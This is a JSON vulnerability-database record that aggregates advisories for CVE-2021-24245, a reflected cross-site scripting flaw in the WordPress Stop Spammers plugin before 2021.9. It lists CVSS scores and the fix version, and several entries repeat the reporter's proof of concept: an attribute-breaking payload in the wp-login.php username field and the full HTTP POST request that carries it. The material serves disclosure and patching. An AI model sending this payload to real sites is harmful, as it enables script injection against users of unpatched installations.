The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and led to a reflected Cross-Site Scripting issue.
{"id": "WPEX-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)", "description": "The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.\n", "published": "2021-04-08T00:00:00", "modified": "2021-04-09T07:00:52", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "", "reporter": "Hosein vita", "references": ["https://plugins.trac.wordpress.org/changeset/2509620/"], "cvelist": ["CVE-2021-24245"], "immutableFields": [], "lastseen": "2021-05-14T11:33:04", "viewCount": 115, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0303"]}, {"type": "cve", "idList": ["CVE-2021-24245"]}, {"type": "exploitdb", "idList": ["EDB-ID:49880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162623"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735"]}, {"type": "zdt", "idList": ["1337DAY-ID-36267"]}], "rev": 4}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0303"]}, {"type": "cve", "idList": ["CVE-2021-24245"]}, {"type": "exploitdb", "idList": ["EDB-ID:49880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162623"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735"]}, {"type": "zdt", "idList": ["1337DAY-ID-36267"]}]}, "exploitation": null, "vulnersScore": 4.2}, "sourceData": "From an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad\" accesskey=X onclick=alert(1) \"\r\n\r\nAn input such as ad\">TEST can also be used to prove the injection which will result in TEST\" /> being displayed in 
the page\r\n\r\nThis can be achieved via the wp-login.php form for example, either in the Username or Password fields.\r\n\r\nPOST /wp-login.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 148\r\nConnection: close\r\nCookie: wordpress_test_cookie=WP%20Cookie%20check\r\nUpgrade-Insecure-Requests: 1\r\n\r\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=Log+In&testcookie=1", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645893725}}
{"wpvulndb": [{"lastseen": "2021-05-14T11:33:04", "description": "The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.\n\n### PoC\n\nFrom an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad\" accesskey=X onclick=alert(1) \" An input such as ad\">TEST can also be used to prove the injection which will result in TEST\" /> being displayed in the page This can be achieved via the wp-login.php form for example, either in the Username or Password fields. POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 148 Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check Upgrade-Insecure-Requests: 1 log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd;=&wp-submit;=Log+In&testcookie;=1\n", "cvss3": {}, "published": "2021-04-08T00:00:00", "type": "wpvulndb", "title": "Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24245"], "modified": "2021-04-09T07:00:52", "id": "WPVDB-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735", "href": "https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:28", "description": "A cross site scripting vulnerability exists in WordPress Stop Spammers plugin. 
Successful exploitation of this vulnerability would allow remote attackers to inject an arbitrary web script into the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-01T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Stop Spammers Plugin Cross Site Scripting (CVE-2021-24245)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-06-01T00:00:00", "id": "CPAI-2021-0303", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-11-08T14:24:01", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-19T00:00:00", "type": "zdt", "title": "WordPress Stop Spammers 2021.8 Plugin - (log) Reflected 
Cross-site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-05-19T00:00:00", "id": "1337DAY-ID-36267", "href": "https://0day.today/exploit/description/36267", "sourceData": "# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)\n# Exploit Author: Hosein Vita\n# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/\n# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip\n# Version: <= 2021.8\n# Tested on: Windows-Ubuntu\n# CVE : CVE-2021-24245\n\nSummary:\n\nReflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript\n\nProof of concepts:\n\n1-Install \"Stop Spammers <= 2021.8\" in your wordpress website\n2-For testing remove your IP address from the allowed list\n3-Go to http://<YOUR-WEBSITE>/wp-admin\n4-In username field enter this payload ~> ad\" accesskey=X onclick=alert(1) \"\n#Notice the `ad` keyword must be in your payload!\n5-Press Alt + Shift + X to trigger Xss\n#Tested on Firefox\n\nRequest POC:\n\nPOST /wp-login.php HTTP/1.1\nHost: localhost\nConnection: close\nContent-Length: 161\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: 
wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n", "sourceHref": "https://0day.today/exploit/36267", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:50:11", "description": "The Stop Spammers WordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-24245", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-05-26T19:35:00", "cpe": [], "id": "CVE-2021-24245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24245", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-05-19T14:32:32", 
"description": "", "cvss3": {}, "published": "2021-05-19T00:00:00", "type": "packetstorm", "title": "WordPress Stop Spammers 2021.8 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24245"], "modified": "2021-05-19T00:00:00", "id": "PACKETSTORM:162623", "href": "https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) \n# Date: 04/08/2021 \n# Exploit Author: Hosein Vita \n# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/ \n# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip \n# Version: <= 2021.8 \n# Tested on: Windows-Ubuntu \n# CVE : CVE-2021-24245 \n \nSummary: \n \nReflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript \n \nProof of concepts: \n \n1-Install \"Stop Spammers <= 2021.8\" in your wordpress website \n2-For testing remove your IP address from the allowed list \n3-Go to http://<YOUR-WEBSITE>/wp-admin \n4-In username field enter this payload ~> ad\" accesskey=X onclick=alert(1) \" \n#Notice the `ad` keyword must be in your payload! 
\n5-Press Alt + Shift + X to trigger Xss \n#Tested on Firefox \n \nRequest POC: \n \nPOST /wp-login.php HTTP/1.1 \nHost: localhost \nConnection: close \nContent-Length: 161 \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nCookie: wordpress_test_cookie=WP+Cookie+check; \n \nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1 \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162623/wpstopspammers20218-xss.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:49", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Hosein_vita in WordPress Stop Spammers plugin (versions <= 2021.8).\n\n## Solution\n\n\r\n Update the WordPress Stop Spammers plugin to the latest available version (at least 2021.9).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-08T00:00:00", "type": "patchstack", "title": "WordPress Stop Spammers plugin <= 2021.8 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-04-08T00:00:00", "id": "PATCHSTACK:72442C545D566B6B90B55456E1E30C1F", "href": "https://patchstack.com/database/vulnerability/stop-spammer-registrations-plugin/wordpress-stop-spammers-plugin-2021-8-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:29:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-19T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245", "2021-24245"], "modified": "2021-05-19T00:00:00", "id": "EDB-ID:49880", "href": "https://www.exploit-db.com/exploits/49880", "sourceData": "# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)\r\n# Date: 04/08/2021\r\n# Exploit Author: Hosein Vita\r\n# Vendor 
Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/\r\n# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip\r\n# Version: <= 2021.8\r\n# Tested on: Windows-Ubuntu\r\n# CVE : CVE-2021-24245\r\n\r\nSummary:\r\n\r\nReflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript\r\n\r\nProof of concepts:\r\n\r\n1-Install \"Stop Spammers <= 2021.8\" in your wordpress website\r\n2-For testing remove your IP address from the allowed list\r\n3-Go to http://<YOUR-WEBSITE>/wp-admin\r\n4-In username field enter this payload ~> ad\" accesskey=X onclick=alert(1) \"\r\n#Notice the `ad` keyword must be in your payload!\r\n5-Press Alt + Shift + X to trigger Xss\r\n#Tested on Firefox\r\n\r\nRequest POC:\r\n\r\nPOST /wp-login.php HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nContent-Length: 161\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: wordpress_test_cookie=WP+Cookie+check;\r\n\r\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1", "sourceHref": "https://www.exploit-db.com/download/49880", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}